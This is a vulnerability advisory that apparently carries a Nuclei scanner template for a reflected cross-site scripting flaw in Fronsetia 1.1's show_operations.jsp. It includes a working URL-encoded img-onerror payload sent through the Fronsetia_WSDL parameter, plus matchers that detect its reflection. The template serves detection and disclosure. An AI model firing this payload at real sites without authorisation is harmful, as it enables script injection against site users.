The fronsetiav1.1 application is vulnerable to a Reflected XSS attack through the show_operations.jsp endpoint. An attacker can inject malicious scripts via the WSDL Location input, which is executed in the victim's browser due to improper input sanitization. This allows attackers to execute arbitrary JavaScript, potentially stealing sensitive data or performing phishing attacks..
PoC代码[已公开]
id: fronsetiav-xss
info:
name: Fronsetiav1.1 - Cross-Site Scripting
author: s4e-io
severity: high
description: |
The fronsetiav1.1 application is vulnerable to a Reflected XSS attack through the show_operations.jsp endpoint. An attacker can inject malicious scripts via the WSDL Location input, which is executed in the victim's browser due to improper input sanitization. This allows attackers to execute arbitrary JavaScript, potentially stealing sensitive data or performing phishing attacks..
reference:
- https://seclists.org/fulldisclosure/2024/Nov/10
- https://packetstormsecurity.com/files/182764/fronsetia-1.1-Cross-Site-Scripting.html
- https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-14-reflected.html
metadata:
max-request: 1
vendor: fronsetiav1.1
product: fronsetiav1.1
tags: xss,fronsetia,vuln
http:
- method: GET
path:
- "{{BaseURL}}/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg%2Bsrc%3Dx%20onerror%3Dalert(document.domain)%3E"
matchers:
- type: dsl
dsl:
- 'contains(body, "\"><img src=x onerror=alert(document.domain)> </title>")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 490a00463044022033676536c8f038b675d0b5faa7714600a4cc5a8066ca6aebc49b760b836b66960220354713ab71185991dd226a697071184b89ceaf6c85250168a049ec30bc9b6925:922c64590222798bb761d5b6d8e72950